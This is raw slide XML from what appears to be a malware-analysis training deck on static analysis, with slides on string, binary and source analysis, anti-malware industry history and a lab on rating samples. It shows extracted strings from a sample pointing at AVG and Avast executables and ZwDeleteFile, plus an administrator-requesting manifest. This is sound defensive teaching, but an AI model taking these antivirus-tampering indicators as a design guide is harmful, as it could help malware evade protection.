          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What is static analysis?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sample analysis performed without the benefit of dynamic execution environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Pros?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Cons?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90698975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static analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Elements of static analysis?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>String analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Binary analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Source analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74800991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string analysis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825632"/>
            <a:ext cx="3752850" cy="4332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862693"/>
            <a:ext cx="4876800" cy="4223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Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="881442347"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381000" y="1047750"/>
          <a:ext cx="7162800" cy="3032760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7162800"/>
              </a:tblGrid>
              <a:tr h="3032760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001840: 'px.exe'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001850: '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>gmfa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001860: 'G2013\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>av</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001880: 'G\AV'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001892: '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>DosDevices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\C:\Arquivos de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>programas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\AV'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x000018E0: 'vc.exe'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x000018F0: '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>stS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001900: '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>st</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\Ava'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001910: 'ST Software\Ava'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001932: '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>DosDevices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\C:\Arquivos de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>programas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\AVA'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>0x00001F0A: '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>ZwDeleteFile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>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6267038"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="4248150"/>
          <a:ext cx="7696200" cy="670560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7696200"/>
              </a:tblGrid>
              <a:tr h="670560">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>DosDevices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\C:\Arquivos de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>programas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\AVG\AVG2013\avgmfapx.exe'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>DosDevices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\C:\Arquivos de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>programas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\AVAST Software\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Avast</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>\AvastSvc.exe'</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2569827983"/>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Binary analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">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1326"/>
            <a:ext cx="41910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100" y="210935"/>
            <a:ext cx="4305300" cy="4970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Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3739721997"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1358611"/>
          <a:ext cx="8610600" cy="2773679"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8610600"/>
              </a:tblGrid>
              <a:tr h="640080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>  &lt;assembly </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>xmlns</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>="urn:schemas-microsoft-com:asm.v1" </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>manifestVersion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>="1.0"&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>     &lt;ms_asmv2:trustInfo xmlns:ms_asmv2="urn:schemas-microsoft-com:asm.v2"&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>        &lt;ms_asmv2:security&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>           &lt;ms_asmv2:requestedPrivileges&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>              &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" u="heavy" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ms_asmv2:requestedExecutionLevel level="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" u="heavy" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>requireAdministrator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>" </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>uiAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>="false" /&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>           &lt;/ms_asmv2:requestedPrivileges&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>        &lt;/ms_asmv2:security&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>     &lt;/ms_asmv2:trustInfo&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>  &lt;/assembly&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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14300"/>
            <a:ext cx="2028825"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837278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Source analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AutoIT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Keytools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> CHM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DJJavaDecompiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dotPeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> .NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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050"/>
            <a:ext cx="8448675"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6110996"/>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27"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>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282" y="2114550"/>
            <a:ext cx="3033712" cy="2276475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="999999"/>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53882" dir="2700000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="E6E6E6"/>
                  </a:outerShdw>
                </a:effectLst>
              </a14:hiddenEffects>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basics of malware: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>25 years of AM industry </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Commercial anti-virus came to market in early 90s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Early On Demand scanners received </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>monthly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>updates via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>physical floppy disks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Careers in the industry hard to come by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CARO (Computer Antivirus Research Organization) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>formed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>in 1990</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sharing of information mutually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>beneficially</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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8277" y="819150"/>
            <a:ext cx="3135723" cy="4313237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="999999"/>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53882" dir="2700000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="E6E6E6"/>
                  </a:outerShdw>
                </a:effectLst>
              </a14:hiddenEffects>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40843148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Lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Forensic Information to Rate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
